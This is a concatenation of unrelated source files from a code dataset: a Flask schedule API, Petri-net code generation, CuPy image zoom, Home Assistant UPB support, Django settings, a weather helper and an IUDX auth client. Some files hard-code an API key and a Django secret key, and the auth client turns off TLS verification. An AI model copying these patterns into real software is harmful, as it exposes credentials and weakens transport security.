            } for o in args['operations']]

            Management_sch_auto.delete().where(Management_sch_auto.management_sch_id == m.id).execute()
            lib.bulk_insert(base.db, Management_sch_auto, new_auto)
            Management_sch_op.delete().where(Management_sch_op.management_sch_id == m.id).execute()
            lib.bulk_insert(base.db, Management_sch_op, new_ops)

            return 200
        except IntegrityError:
            abort(400, message='Management schedule name must be unique.')
        except Management_sch.DoesNotExist:
            # Fixed: this previously caught Cons_prac_lum.DoesNotExist, so a
            # missing schedule fell through to the generic 400 handler
            # instead of returning the intended 404.
            abort(404, message='Management schedule {id} does not exist'.format(id=id))
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
class ManagementSchPostApi(BaseRestModel):
    """Creation endpoint for management schedules."""
    def post(self, project_db):
        """Create a schedule plus its auto-operations and operations."""
        try:
            # Fixed inconsistency: every other write endpoint in this module
            # initializes the project database connection before touching
            # the models; this one previously did not.
            SetupProjectDatabase.init(project_db)
            args = get_mgt_args()
            m = Management_sch()
            m.name = args['name']
            m.save()

            # Resolve each named decision table in lum.dtl to its id.
            new_auto = []
            for a in args['auto_ops']:
                try:
                    dt = D_table_dtl.get((D_table_dtl.file_name == 'lum.dtl') & (D_table_dtl.name == a))
                    new_auto.append({'management_sch_id': m.id, 'd_table_id': dt.id})
                except D_table_dtl.DoesNotExist:
                    abort(404, message='Decision table {name} does not exist'.format(name=a))

            # Operation order comes straight from the client payload
            # (the original kept a dead local counter here; removed).
            new_ops = [{
                'management_sch_id': m.id,
                'op_typ': o['op_typ'],
                'mon': o['mon'],
                'day': o['day'],
                'op_data1': o['op_data1'],
                'op_data2': o['op_data2'],
                'op_data3': o['op_data3'],
                'order': o['order'],
                'hu_sch': o['hu_sch']
            } for o in args['operations']]

            lib.bulk_insert(base.db, Management_sch_auto, new_auto)
            lib.bulk_insert(base.db, Management_sch_op, new_ops)

            return 201
        except IntegrityError:
            abort(400, message='Management schedule name must be unique.')
        except Exception as ex:
            abort(400, message="Unexpected error {ex}".format(ex=ex))
| 37.381579 | 143 | 0.742143 |
acdf88dfb7294f7948f1c92cb131526d8d1cdf30 | 4,780 | py | Python | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | 2 | 2020-05-01T21:10:50.000Z | 2020-05-23T17:06:03.000Z | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | 2 | 2020-07-08T18:09:05.000Z | 2020-07-15T15:12:07.000Z | petri_net_interpreter/os_features.py | MarshallRawson/petri_net_interpreter | 5324b808363b726f38821a78b9246456914a9c42 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from abc import ABC, abstractmethod
from petri_net_interpreter.graph_entities import Place, Transition
class OsFeature(ABC):
    # Base class for code-generation features. Each feature can emit a
    # prototype, an optional definition and initialization text.
    def __init__(self, parent):
        # parent: the owning object this feature generates code for.
        self.parent = parent
    @abstractmethod
    def prototype(self):
        # Return the generated declaration/prototype text.
        pass
    def define(self):
        # Most features need no separate definition text.
        return ''
    @abstractmethod
    def initialize(self):
        # Return the generated initialization text.
        pass
class Debug(OsFeature):
    """Emits a generated snippet that snapshots every place's status into
    a printable debug string."""

    def __init__(self, parent):
        super().__init__(parent)

    def string_len(self):
        """Buffer size: all place names plus 6 chars of per-name format text
        (the ': %d\\n' appended for each place)."""
        name_chars = sum(len(name) for name in self.parent.places)
        return name_chars + 6 * len(self.parent.places)

    def get_debug_state(self):
        """Build the snprintf(...) snippet listing each place's status."""
        size = self.string_len()
        pieces = [
            '// Get Debug state\n',
            'char debug_state[' + str(size) + '];\n',
            'snprintf(debug_state, ' + str(size) + ', "',
        ]
        pieces.extend(name + ': %d\\n' for name in self.parent.places)
        pieces.append('\\n", \n')
        pieces.extend(place.output.get_status() + ',\n'
                      for place in self.parent.places.values())
        text = ''.join(pieces)
        # Drop the comma left dangling after the last argument.
        last_comma = text.rfind(',')
        text = text[:last_comma] + text[last_comma + 1:]
        return text + ');\n'

    def prototype(self):
        return ''

    def initialize(self):
        return ''

    def call(self, give_string):
        return give_string
class ProccessOutput(OsFeature):
    # Abstract output channel owned by a place; subclasses emit generated
    # code for giving/taking values and readiness checks.
    # (Spelling of the class name is kept for backward compatibility.)
    def __init__(self, parent, name):
        super().__init__(parent)
        self.name = name
        # Stack of earlier names so change_name/revert_name can nest.
        self.previous_names = []
    @abstractmethod
    def is_ready(self):
        # Generated expression testing whether data is available.
        pass
    @abstractmethod
    def take(self, val):
        # Generated code consuming a value from the channel.
        pass
    @abstractmethod
    def give(self, val):
        # Generated code publishing a value to the channel.
        pass
    @abstractmethod
    def close(self):
        pass
    def change_name(self, new_name):
        # Temporarily rename; the previous name can be restored later.
        self.previous_names.append(self.name)
        self.name = new_name
    def revert_name(self):
        # Restore the most recently replaced name.
        self.name = self.previous_names.pop()
class InterProccessCommunication(ProccessOutput):
    """Queue-backed process output: give/take map onto enqueue/dequeue and
    readiness/status map onto the queue's data check and size."""

    def __init__(self, place, name=None):
        default = place.name + '_OUT_IPC'
        super().__init__(place, default if name is None else name)

    def give(self, val):
        """Giving a value means enqueueing it."""
        return self.enqueue(val)

    def take(self, val):
        """Taking a value means dequeueing it."""
        return self.dequeue(val)

    @abstractmethod
    def enqueue(self, val):
        pass

    @abstractmethod
    def dequeue(self, val):
        pass

    def is_ready(self):
        """Ready when the queue reports new data."""
        return self.check_for_new_data()

    @abstractmethod
    def check_for_new_data(self):
        pass

    @abstractmethod
    def get_size(self):
        pass

    def get_status(self):
        """Status is the queue's current size."""
        return self.get_size()

    def __str__(self):
        return self.name
class Semaphore(ProccessOutput):
    """Counting-semaphore process output: give/take map onto signal/wait
    and readiness is a generated 'value > 0' test."""

    def __init__(self, place, name=None):
        default = place.name + '_OUT_SEMAPHORE'
        super().__init__(place, default if name is None else name)

    def give(self, val):
        """Giving signals the semaphore; *val* is ignored."""
        return self.signal()

    @abstractmethod
    def signal(self):
        pass

    def take(self, val):
        """Taking waits on the semaphore; *val* is ignored."""
        return self.wait()

    @abstractmethod
    def wait(self):
        pass

    @abstractmethod
    def get_value(self):
        pass

    def get_status(self):
        """Status is the semaphore's current counter expression."""
        return self.get_value()

    def is_ready(self):
        """Generated readiness test: the counter is positive."""
        return f'({self.get_value()} > 0)'

    def __str__(self):
        return self.name
class OperatingSystem(ABC):
    """Target-platform backend for code generation: bundles the concrete
    IPC, semaphore, place, transition and debug classes plus file-level
    boilerplate hooks."""

    def __init__(self, ipc, sem, place, transition, debug=Debug):
        # Validate each collaborator class in the original order, storing
        # the attribute before the check (matching the prior behavior).
        required = (
            ('ipc', ipc, InterProccessCommunication),
            ('sem', sem, Semaphore),
            ('place', place, Place),
            ('transition', transition, Transition),
            ('debug', debug, Debug),
        )
        for label, value, base in required:
            setattr(self, label, value)
            if not issubclass(value, base):
                raise Exception(label + ' must inherit from ' + base.__name__)

    @staticmethod
    def place_body_name(place):
        """Name of the generated body function for *place*."""
        return place.name + '_body'

    @staticmethod
    def place_wrapper_name(place):
        """Name of the generated wrapper function for *place*."""
        return place.name + '_wrapper'

    def header_file_start(self, net):
        """Text emitted at the top of the generated header file."""
        return "#pragma once"

    def header_file_end(self, net):
        return ''

    def source_file_start(self, net):
        return ''

    def source_file_end(self, net):
        return ''

    @staticmethod
    @abstractmethod
    def includes():
        pass

    @staticmethod
    @abstractmethod
    def kill_self():
        pass

    @classmethod
    @abstractmethod
    def add_thread(cls, place, param):
        pass

    def initialize(self):
        return ''
| 22.441315 | 79 | 0.591841 |
acdf8a6033754a727dcc799205f59faf393b07cd | 443 | py | Python | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | leonardo_form_pegastudio/migrations/0003_auto_20180204_1538.py | dresl/leonardo-form-pegastudio | 915d6328a8ceef2217c896e3c3f0257092f08a16 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: change PegastudioProducts.document to a plain FileField."""

    dependencies = [
        # Must run after the previous auto-generated migration.
        ('leonardo_form_pegastudio', '0002_auto_20180204_1457'),
    ]
    operations = [
        migrations.AlterField(
            model_name='pegastudioproducts',
            name='document',
            # NOTE(review): b'documents/' (a bytes upload_to) is a Python 2
            # artifact; plain 'documents/' is conventional — confirm before changing.
            field=models.FileField(upload_to=b'documents/'),
        ),
    ]
| 22.15 | 64 | 0.634312 |
acdf8aad927262e88be2f68a3ea9b9a8c2559465 | 9,397 | py | Python | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 131 | 2021-04-09T19:02:10.000Z | 2022-03-25T08:49:11.000Z | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 222 | 2021-04-12T07:15:14.000Z | 2022-03-31T20:01:01.000Z | python/cucim/src/cucim/core/operations/intensity/zoom.py | aasthajh/cucim | a95cc5c4ab25beffeac42d642dea8cb1bbf21408 | [
"Apache-2.0"
] | 34 | 2021-04-09T18:54:13.000Z | 2022-03-29T12:59:26.000Z | # Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import math
from typing import Any, Sequence, Union
import cupy
import numpy as np
from .kernel.cuda_kernel_source import cuda_kernel_code
_logger = logging.getLogger("zoom_cucim")
# Compile the raw CUDA kernel source once at import time; zoom() fetches
# individual kernels by name via CUDA_KERNELS.get_function(...).
CUDA_KERNELS = cupy.RawModule(code=cuda_kernel_code)
def zoom(
    img: Any,
    zoom_factor: Sequence[float]
):
    """Zooms an ND image.

    Parameters
    ----------
    img : channel first, cupy.ndarray or numpy.ndarray
        Input data of shape (C, H, W). Can also batch process input of shape
        (N, C, H, W). Can be a numpy.ndarray or cupy.ndarray.
    zoom_factor: Sequence[float]
        The zoom factor along the spatial axes.
        Zoom factor should contain one value for each spatial axis.

    Returns
    -------
    out : cupy.ndarray or numpy.ndarray
        Output data. Same dimensions and type as input.

    Raises
    ------
    TypeError
        If input 'img' is not cupy.ndarray or numpy.ndarray

    Examples
    --------
    >>> import cucim.core.operations.intensity as its
    >>> # input is channel first 3d array
    >>> output_array = its.zoom(input_arr, [1.1, 1.1])
    """
    try:
        # Normalize the input to a contiguous float32 CuPy array; remember
        # whether we must convert back to NumPy at the end.
        to_cupy = False
        if isinstance(img, np.ndarray):
            to_cupy = True
            cupy_img = cupy.asarray(img, dtype=cupy.float32, order="C")
        elif not isinstance(img, cupy.ndarray):
            raise TypeError("img must be a cupy.ndarray or numpy.ndarray")
        else:
            cupy_img = cupy.ascontiguousarray(img)

        if cupy_img.dtype != cupy.float32:
            if not cupy.can_cast(img.dtype, cupy.float32):
                # BUG FIX: this message was a plain string, so the {...}
                # placeholder was printed literally; it is now an f-string.
                raise ValueError(
                    f"Cannot safely cast type {cupy_img.dtype.name} to 'float32'"
                )
            cupy_img = cupy_img.astype(cupy.float32)

        if img.ndim not in (3, 4):
            raise ValueError(
                f"Unsupported img.ndim={img.ndim}. Expected `img` with "
                "dimensions (C, H, W) or (N, C, H, W)."
            )
        if len(img.shape) == 4:
            N, C, H, W = img.shape
        else:  # ndim == 3, validated above
            C, H, W = img.shape
            N = 1

        # Target (zoomed) size; identity zoom is a no-op.
        output_size_cu = [N, C,
                          int(math.floor(H * zoom_factor[0])),
                          int(math.floor(W * zoom_factor[1]))]
        if output_size_cu[2] == H and output_size_cu[3] == W:
            return img

        def get_block_size(output_size_cu, H, W):
            # Pick the largest CUDA block whose input tile fits in 48KB of
            # shared memory (standard CC optimal occupancy).
            # The array is (H, W) but the kernel maps x -> W, y -> H.
            max_smem = 48 * 1024
            cu_block_options = [(16, 16, 1), (16, 8, 1), (8, 8, 1), (8, 4, 1)]
            for param in cu_block_options:
                h_stretch = [math.floor((0 * H) / output_size_cu[2]),
                             math.ceil((param[1] * H) / output_size_cu[2])]
                w_stretch = [math.floor((0 * W) / output_size_cu[3]),
                             math.ceil((param[0] * W) / output_size_cu[3])]
                smem_size = (h_stretch[1] + 1) * (w_stretch[1] + 1) * 4
                if smem_size < max_smem:
                    return param, smem_size
            raise Exception(
                "zoom could not find a shared memory configuration")

        # Input pitch: elements per (N, C) plane.
        pitch = H * W
        block_config, smem_size = get_block_size(output_size_cu, H, W)
        grid = (int((output_size_cu[3] - 1) / block_config[0] + 1),
                int((output_size_cu[2] - 1) / block_config[1] + 1), C * N)

        is_zoom_out = output_size_cu[2] < H and output_size_cu[3] < W
        is_zoom_in = output_size_cu[2] > H and output_size_cu[3] > W

        # BUG FIX (latent): [[0, 0]] * 2 aliases the same inner list; use
        # independent lists instead.
        pad_dims = [[0, 0] for _ in range(2)]    # zoom out
        slice_dims = [[0, 0] for _ in range(2)]  # zoom in
        for idx, (orig, zoomed) in enumerate(zip((H, W),
                                                 (output_size_cu[2],
                                                  output_size_cu[3]))):
            diff = orig - zoomed
            half = abs(diff) // 2
            if diff > 0:
                pad_dims[idx] = [half, diff - half]
            elif diff < 0:
                slice_dims[idx] = [half, half + orig]

        result = cupy.ndarray(cupy_img.shape, dtype=cupy.float32)
        if is_zoom_in:
            # Crop the central region and stretch it back to (H, W).
            kernel = CUDA_KERNELS.get_function("zoom_in_kernel")
            kernel(grid, block_config,
                   args=(cupy_img, result, np.int32(H), np.int32(W),
                         np.int32(output_size_cu[2]),
                         np.int32(output_size_cu[3]),
                         np.int32(pitch), np.int32(slice_dims[0][0]),
                         np.int32(slice_dims[0][1]),
                         np.int32(slice_dims[1][0]),
                         np.int32(slice_dims[1][1])),
                   shared_mem=smem_size)
        elif is_zoom_out:
            # Shrink into the center, then replicate the edges outward.
            kernel = CUDA_KERNELS.get_function("zoom_out_kernel")
            kernel(grid, block_config,
                   args=(cupy_img, result, np.int32(H), np.int32(W),
                         np.int32(output_size_cu[2]),
                         np.int32(output_size_cu[3]),
                         np.int32(pitch), np.int32(pad_dims[0][0]),
                         np.int32(pad_dims[0][1]),
                         np.int32(pad_dims[1][0]),
                         np.int32(pad_dims[1][1])),
                   shared_mem=smem_size)
            # Edge padding kernel covers the full (H, W) output.
            kernel = CUDA_KERNELS.get_function("zoomout_edge_pad")
            grid = (int((W - 1) / block_config[0] + 1),
                    int((H - 1) / block_config[1] + 1),
                    C * N)
            kernel(grid, block_config,
                   args=(result, np.int32(H), np.int32(W), np.int32(pitch),
                         np.int32(pad_dims[0][0]), np.int32(pad_dims[1][0]),
                         np.int32(pad_dims[0][0] + output_size_cu[2]),
                         np.int32(pad_dims[1][0] + output_size_cu[3])))
        else:
            raise Exception(
                "Can only handle simultaneous expansion (or shrinkage) in "
                "both H, W dimensions; check zoom factors")

        if img.dtype != np.float32:
            result = result.astype(img.dtype)
        if to_cupy:
            result = cupy.asnumpy(result)
        return result
    except Exception as e:
        _logger.error("[cucim] %s", e, exc_info=True)
        _logger.info("Error executing zoom on GPU")
        raise
def rand_zoom(
    img: Any,
    min_zoom: Union[Sequence[float], float] = 0.9,
    max_zoom: Union[Sequence[float], float] = 1.1,
    prob: float = 0.1
):
    """
    Randomly calls zoom with a random zoom factor.

    Parameters
    ----------
    img : channel first, cupy.ndarray or numpy.ndarray
        Input data of shape (C, H, W). Can also batch process input of shape
        (N, C, H, W). Can be a numpy.ndarray or cupy.ndarray.
    min_zoom: Min zoom factor. Can be float or sequence same size as image.
        If a float, select a random factor from `[min_zoom, max_zoom]` then
        apply to all spatial dims to keep the original spatial shape ratio.
        If a sequence, min_zoom should contain one value for each spatial axis.
    max_zoom: Max zoom factor. Can be float or sequence same size as image.
        If a float, select a random factor from `[min_zoom, max_zoom]` then
        apply to all spatial dims to keep the original spatial shape ratio.
        If a sequence, max_zoom should contain one value for each spatial axis.
    prob: Probability of zooming.

    Returns
    -------
    out : cupy.ndarray or numpy.ndarray
        Output data. Same dimensions and type as input.

    Raises
    ------
    TypeError
        If input 'img' is not cupy.ndarray or numpy.ndarray

    Examples
    --------
    >>> import cucim.core.operations.intensity as its
    >>> # input is channel first 3d array
    >>> output_array = its.rand_zoom(input_arr)
    """
    R = np.random.RandomState()
    # Single draw decides whether to zoom at all (was compared twice before).
    if R.rand() >= prob:
        return img
    try:
        # Sequence bounds: one independent factor per spatial axis.
        zoom_factor = [R.uniform(low, high)
                       for low, high in zip(min_zoom, max_zoom)]
    except TypeError:
        # BUG FIX: was a broad `except Exception`; zip() on scalar bounds
        # raises TypeError, so catch only that and draw one shared factor.
        zoom_factor = [R.uniform(min_zoom, max_zoom)]
    if len(zoom_factor) != 2:
        # Replicate a single factor for both H and W.
        zoom_factor = [zoom_factor[0] for _ in range(2)]
    return zoom(img, zoom_factor)
| 36.707031 | 79 | 0.552836 |
acdf8bc13e7271df2e72e13e3e0c682b5c3d7eca | 520 | py | Python | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | 1 | 2021-12-28T14:33:22.000Z | 2021-12-28T14:33:22.000Z | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | null | null | null | RASA_assistant/actions/weather.py | PoCInnovation/Elivia-AI | fb632ee2309bb7a682e495da589e6443488e15cf | [
"MIT"
] | null | null | null | import requests
def get_weather(city):
    """Fetch current conditions for *city* from OpenWeatherMap.

    Prints a short human-readable summary and returns the 'main' section of
    the API response (temperatures, pressure, humidity, ...).
    """
    # SECURITY NOTE: the API key is hard-coded here; move it to an
    # environment variable or config file before publishing.
    api_address = 'http://api.openweathermap.org/data/2.5/weather?appid=0c42f7f6b53b244c78a418f4f181282a&q='
    url = api_address + city
    # BUG FIX: added a timeout so a stalled API call cannot hang the caller.
    json_data = requests.get(url, timeout=10).json()
    format_add = json_data['main']
    print(format_add)
    # Temperatures arrive in Kelvin; convert to (approximate) Celsius.
    # BUG FIX: typos in the message and the max offset was 272 (off by 1 K).
    print("Weather is {0} Temperature is minimum {1} Celsius and maximum is {2} Celsius".format(
        json_data['weather'][0]['main'], int(format_add['temp_min'] - 273), int(format_add['temp_max'] - 273)))
    return format_add
| 40 | 112 | 0.682692 |
acdf8bd3113aa2e95f909896fddd15d80087e30a | 3,435 | py | Python | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
] | null | null | null | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
] | null | null | null | jobsearch/jobsearch/settings.py | shamsher4499/Job_website | cb76162db6f179dd5caf2abfdc63bbd6989e92c2 | [
"MIT"
"""
Django settings for jobsearch project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# from the environment before any production deployment.
SECRET_KEY = 'kbmu^2zxted6@ee$ki2wf$)$(qln2dh+m)nb()tjiaj+7cyfz5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'core',  # project app
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jobsearch.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # NOTE(review): this searches the project root and a 'templates'
        # string; the usual form is [BASE_DIR / 'templates'] — confirm intent.
        'DIRS': [BASE_DIR, 'templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'jobsearch.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': BASE_DIR / 'db.sqlite3',
    }
}
# Alternative PostgreSQL configuration (kept for reference, currently unused):
# DATABASES = {
#     'default': {
#         'ENGINE': 'django.db.backends.postgresql_psycopg2',
#         'NAME': 'shamsher',
#         'USER': 'postgres',
#         'PASSWORD': '12345',
#         'HOST': 'localhost',
#     }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
# NOTE(review): this is the tuple (BASE_DIR, 'static'), so the project root
# itself is served as a static dir — confirm [BASE_DIR / 'static'] wasn't meant.
STATICFILES_DIRS = BASE_DIR, 'static'
MEDIA_ROOT = BASE_DIR / 'media'
MEDIA_URL = '/media/'
acdf8c045a1a6dc90ba23f17c311885771003932 | 3,788 | py | Python | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 22,481 | 2020-03-02T13:09:59.000Z | 2022-03-31T23:34:28.000Z | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | homeassistant/components/upb/__init__.py | learn-home-automation/core | c5d8792c3487e9b418b1e7d623bf59e7dbddd6b7 | [
"Apache-2.0"
] | 11,411 | 2020-03-02T14:19:20.000Z | 2022-03-31T22:46:07.000Z | """Support the UPB PIM."""
import upb_lib
from homeassistant.const import ATTR_COMMAND, CONF_FILE_PATH, CONF_HOST, Platform
from homeassistant.core import callback
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import (
ATTR_ADDRESS,
ATTR_BRIGHTNESS_PCT,
ATTR_RATE,
DOMAIN,
EVENT_UPB_SCENE_CHANGED,
)
PLATFORMS = [Platform.LIGHT, Platform.SCENE]
async def async_setup_entry(hass, config_entry):
    """Set up a new config_entry for UPB PIM."""
    url = config_entry.data[CONF_HOST]
    file = config_entry.data[CONF_FILE_PATH]
    # Create and connect the PIM client from the UPStart export file.
    upb = upb_lib.UpbPim({"url": url, "UPStartExportFile": file})
    upb.connect()
    # Shared per-entry storage consumed by the light/scene platforms.
    hass.data.setdefault(DOMAIN, {})
    hass.data[DOMAIN][config_entry.entry_id] = {"upb": upb}
    hass.config_entries.async_setup_platforms(config_entry, PLATFORMS)

    def _element_changed(element, changeset):
        # Re-emit UPB link changes as Home Assistant events; ignore
        # changesets without a completed command.
        if (change := changeset.get("last_change")) is None:
            return
        if change.get("command") is None:
            return
        hass.bus.async_fire(
            EVENT_UPB_SCENE_CHANGED,
            {
                ATTR_COMMAND: change["command"],
                ATTR_ADDRESS: element.addr.index,
                ATTR_BRIGHTNESS_PCT: change.get("level", -1),  # -1: not reported
                ATTR_RATE: change.get("rate", -1),  # -1: not reported
            },
        )

    # Subscribe to every known link so scene changes reach the event bus.
    for link in upb.links:
        element = upb.links[link]
        element.add_callback(_element_changed)
    return True
async def async_unload_entry(hass, config_entry):
    """Unload the config_entry and tear down the PIM connection."""
    unloaded = await hass.config_entries.async_unload_platforms(
        config_entry, PLATFORMS
    )
    if not unloaded:
        return False
    # Platforms are gone; disconnect the PIM and drop the entry data.
    entry_data = hass.data[DOMAIN][config_entry.entry_id]
    entry_data["upb"].disconnect()
    hass.data[DOMAIN].pop(config_entry.entry_id)
    return True
class UpbEntity(Entity):
    """Base class for all UPB entities."""

    def __init__(self, element, unique_id, upb):
        """Initialize the base of all UPB devices."""
        self._upb = upb          # PIM client, used for availability checks
        self._element = element  # upb_lib element backing this entity
        # Links and devices share an address space; disambiguate in the id.
        element_type = "link" if element.addr.is_link else "device"
        self._unique_id = f"{unique_id}_{element_type}_{element.addr}"

    @property
    def name(self):
        """Name of the element."""
        return self._element.name

    @property
    def unique_id(self):
        """Return unique id of the element."""
        return self._unique_id

    @property
    def should_poll(self) -> bool:
        """Don't poll this device."""
        # State is pushed via element callbacks (see async_added_to_hass).
        return False

    @property
    def extra_state_attributes(self):
        """Return the default attributes of the element."""
        return self._element.as_dict()

    @property
    def available(self):
        """Is the entity available to be updated."""
        return self._upb.is_connected()

    def _element_changed(self, element, changeset):
        # Hook for subclasses; runs before the HA state write.
        pass

    @callback
    def _element_callback(self, element, changeset):
        """Handle callback from an UPB element that has changed."""
        self._element_changed(element, changeset)
        self.async_write_ha_state()

    async def async_added_to_hass(self):
        """Register callback for UPB changes and update entity state."""
        self._element.add_callback(self._element_callback)
        # Prime the initial state with an empty changeset.
        self._element_callback(self._element, {})
class UpbAttachedEntity(UpbEntity):
    """Base class for UPB attached entities."""

    @property
    def device_info(self) -> DeviceInfo:
        """Device info for the entity."""
        # Device registry entry populated from the upb_lib element metadata.
        return DeviceInfo(
            identifiers={(DOMAIN, self._element.index)},
            manufacturer=self._element.manufacturer,
            model=self._element.product,
            name=self._element.name,
            sw_version=self._element.version,
        )
| 28.916031 | 81 | 0.645459 |
acdf8d9123120aff40012f0ad7c99a9d26806dc9 | 7,055 | py | Python | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | test/auth.py | mahidharc/iudx-auth-server | 343ce3ad4d3345adc72967689b028a8996363b5a | [
"MIT"
] | null | null | null | # vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import os
import sys
import json
import requests
class Auth():
    """Thin client for the IUDX auth server REST API.

    Requests are authenticated with a client certificate (mutual TLS).
    Every helper returns the dict produced by call():
        {"success": bool, "response": dict | None[, "status_code": int]}
    """

    def __init__(self, certificate, key, auth_server="auth.iudx.org.in", version=1):
        # `version` kept for backward compatibility; the path is fixed at /v1/.
        # Since we are testing on localhost, TLS verification is disabled.
        self.ssl_verify = False
        self.url = "https://" + auth_server
        self.credentials = (certificate, key)

    @staticmethod
    def _as_list(value):
        """Return *value* unchanged if it is a list, else wrap it in one."""
        return value if isinstance(value, list) else [value]

    def call(self, api, body=None, method="POST", params=None, header=None):
        """Send one request to /auth/v1/<api> and normalize the response.

        BUG FIX: `header` previously used a mutable default argument ({}).
        """
        if header is None:
            header = {}
        ret = True  # success until proven otherwise
        url = self.url + "/auth" + "/v1/" + api
        response = requests.request(
            method=method,
            url=url,
            verify=self.ssl_verify,
            cert=self.credentials,
            data=json.dumps(body),
            params=params,
            headers={"content-type": "application/json", **header}
        )
        if response.status_code != 200:
            # EXPECT_FAILURE lets negative tests silence the warning.
            if "EXPECT_FAILURE" not in os.environ:
                sys.stderr.write(
                    "WARNING: auth API failure | " +
                    url + " | " +
                    response.reason + " | " +
                    response.text
                )
            ret = False
        if response.headers['content-type'] == 'application/json':
            return {
                "success": ret,
                "response": json.loads(response.text),
                "status_code": response.status_code
            }
        if "EXPECT_FAILURE" not in os.environ:
            sys.stderr.write(
                "WARNING: auth did not send 'application/json' : " + url + "\n"
            )
        return {"success": ret, "response": None}

    def certificate_info(self):
        return self.call("certificate-info")

    def get_token(self, request, token_time=None):
        body = {'request': request}
        if token_time:
            body['token-time'] = token_time
        return self.call("token", body)

    def get_policy(self):
        return self.call("acl")

    def set_policy(self, policy):
        return self.call("acl/set", {'policy': policy})

    def revert_policy(self):
        return self.call("acl/revert")

    def append_policy(self, policy):
        return self.call("acl/append", {'policy': policy})

    def introspect_token(self, token, server_token=None, request=None):
